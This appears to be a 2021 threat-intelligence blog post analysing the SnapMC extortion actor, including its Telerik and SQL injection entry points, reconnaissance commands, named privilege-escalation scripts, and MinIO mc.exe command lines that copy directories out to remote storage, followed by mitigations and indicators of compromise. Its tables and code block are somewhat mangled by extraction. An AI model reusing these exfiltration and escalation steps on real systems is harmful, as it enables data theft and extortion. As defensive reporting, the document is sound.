# SnapMC skips ransomware, steals data
**[blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)**
October 11, 2021
Over the past few months NCC Group has observed an increasing number of data breach extortion
cases, where the attacker steals data and threatens to publish said data online if the victim decides
not to pay. Given the current threat landscape, most notable is the absence of ransomware or any
technical attempt at disrupting the victim’s operations.
Within the data breach extortion investigations, we have identified a cluster of activities defining a
relatively constant modus operandi described in this article. We track this adversary as SnapMC and
have not yet been able to link it to any known threat actors. The name SnapMC is derived from the
actor’s rapid attacks, generally completed in under 30 minutes, and the exfiltration tool mc.exe it
uses.
Extortion emails threatening their recipients have become a trend over time. The lion’s share of these
consists of empty threats sent by perpetrators hoping to profit easily without investing in an actual
attack. In the extortion emails we have seen from SnapMC have given victims 24 hours to get in
contact and 72 hours to negotiate. These deadlines are rarely abided by since we have seen the
attacker to start increasing the pressure well before countdown hits zero. SnapMC includes a list of
the stolen data as evidence that they have had access to the victim’s infrastructure. If the
-----
organization does not respond or negotiate within the given timeframe, the actor threatens to (or
immediately does) publish the stolen data and informs the victim’s customers and various media
outlets.
## Modus Operandi
### Initial Access
At the time of writing NCC Group’s Security Operations Centers (SOCs) have seen SnapMC
scanning for multiple vulnerabilities in both webserver applications and VPN solutions. We have
observed this actor successfully exploiting and stealing data from servers that were vulnerable to:
Remote code execution in Telerik UI for ASPX.NET [1]
SQL injections
After successfully exploiting a webserver application, the actor executes a payload to gain remote
access through a reverse shell. Based on the observed payloads and characteristics the actor
appears to use a publicly available Proof-of-Concept Telerik Exploit [2].
Directly afterwards PowerShell is started to perform some standard reconnaissance activity:
whoami
whoami /priv
wmic logicaldisk get caption,description,providername
net users /priv
_Note: that in the last command the adversary used the ‘/priv’ option, which is not a valid option for the_
_net users command._
### Privilege Escalation
In most of the cases we analyzed the threat actor did not perform privilege escalation. However in
one case we did observe SnapMC trying to escalate privileges by running a handful of PowerShell
scripts:
Invoke-Nightmare [3]
Invoke-JuicyPotato [4]
Invoke-ServiceAbuse [4]
Invoke-EventVwrBypass [6]
Invoke-PrivescAudit [7]
### Collection & Exfiltration
We observed the actor preparing for exfiltration by retrieving various tools to support data collection,
such as 7zip and Invoke-SQLcmd scripts. Those, and artifacts related to the execution or usage of
these tools, were stored in the following folders:
C:\Windows\Temp\
C:\Windows\Temp\Azure
-----
C:\Windows\Temp\Vmware
SnapMC used the Invoke-SQLcmd PowerShell script to communicate with the SQL database and
export data. The actor stored the exported data locally in CSV files and compressed those files with
the 7zip archive utility.
The actor used the MinIO [8] client to exfiltrate the data. Using the PowerShell commandline, the
actor configured the exfil location and key to use, which were stored in a config.json file. During the
exfiltration, MinIO creates a temporary file in the working directory with the file extension
[…].par.minio.
```
C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure alias set
C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure cp --recursive [DIR
NAME] //
### Mitigations
```
First, initial access was generally achieved through known vulnerabilities, for which patches exist.
Patching in a timely manner and keeping (internet connected) devices up-to-date is the most effective
way to prevent falling victim to these types attacks. Make sure to identify where vulnerable software
resides within your network by (regularly performing) vulnerability scanning.
Furthermore, third parties supplying software packages can make use of the vulnerable software as a
component as well, leaving the vulnerability outside of your direct reach. Therefore, it is important to
have an unambiguous mutual understanding and clearly defined agreements between your
organization, and the software supplier about patch management and retention policies. The latter
also applies to a possible obligation to have your supplier provide you with your systems for forensic
and root cause analysis in case of an incident.
Worth mentioning, when reference testing the exploitability of specific versions of Telerik it became
clear that when the software component resided behind a well configured Web Application Firewall
(WAF), the exploit would be unsuccessful.
Finally, having properly implemented detection and incident response mechanisms and processes
seriously increases the chance of successfully mitigating severe impact on your organization. Timely
detection, and efficient response will reduce the damage even before it materializes.
### Conclusion
NCC Group’s Threat Intelligence team predicts that data breach extortion attacks will increase over
time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a fullblown ransomware attack. In a ransomware attack, the adversary needs to achieve persistence and
become domain administrator before stealing data and deploying ransomware. While in the data
breach extortion attacks, most of the activity could even be automated and takes less time while still
having a significant impact. Therefore, making sure you are able to detect such attacks in
combination with having an incident response plan ready to execute at short notice, is vital to
efficiently and effectively mitigate the threat SnapMC poses to your organization.
-----
## MITRE ATT&CK mapping
**Tactic** **Technique** **Procedure**
Reconnaissance T1595.002 –
Vulnerability scanning
Initial Access T1190 – Exploit Public
Facing Application(s)
Privilege
Escalation
Execution T1059.001 –
PowerShell
Collection T1560.001 – Archive
via Utility
SnapMC used the Acunetix vulnerability scanner to
find systems running vulnerable Telerik software.
SnapMC exploited CVE-2019-18935 and SQL
Injection.
SnapMC used a combination of PowerShell cmdlets to
achieve privilege escalation.
SnapMC used a combination of publicly available
PowerShell cmdlets.
SnapMC used 7zip to prepare data for exfiltration.
SnapMC used MinIO client (mc.exe) to exfiltrate data.
Exfiltration
MITRE ATT&CK
T1567 – Exfiltration
over Web Service
T1567.002 –
Exfiltration to Cloud
Storage
## Indicators of Compromise
**Type** **Data** **Notes**
File
location
+ file
name
File
location
+ file
name
C:\Windows\Temp[0-9]{10}.[0-9]{1,8}.dll
_(Example: c:\Windows\Temp\1628862598.87034184.dll)_
File name
of dropped
payload
after
successful
Telerik
exploitation;
the first part
is the
epoch
timestamp
and last
part is
randomly
generated
C:\Windows\Temp\7za.exe 7zip
archiving
utility
-----
**Type** **Data** **Notes**
File
name
File
name
File
name
File
name
File
location
File
location
File
name
s.ps1 SQL cmdlet
a.ps1 SQL cmdlet
x.ps1 SQL cmdlet
*.par.minio Temporary
files
created by
MinIO
during
exfiltration
C:\Windows\Temp\Azure\ Folder for
temporary
files
created by
MinIO
C:\Windows\Temp\Vmware\ Folder for
temporary
files
created by
MinIO
mc.exe MinIO client
Hash 651ed548d2e04881d0ff24f789767c0e MD5 hash
of MinIO
client
Hash b4171d48df233978f8cf58081b8ad9dc51a6097f SHA1 hash
of MinIO
client
Hash 0a1d16e528dc1e41f01eb7c643de0dfb4e5c4a67450c4da78427a8906c70ef3e SHA265
hash of
MinIO client
Indicators of Compromise
## References
-----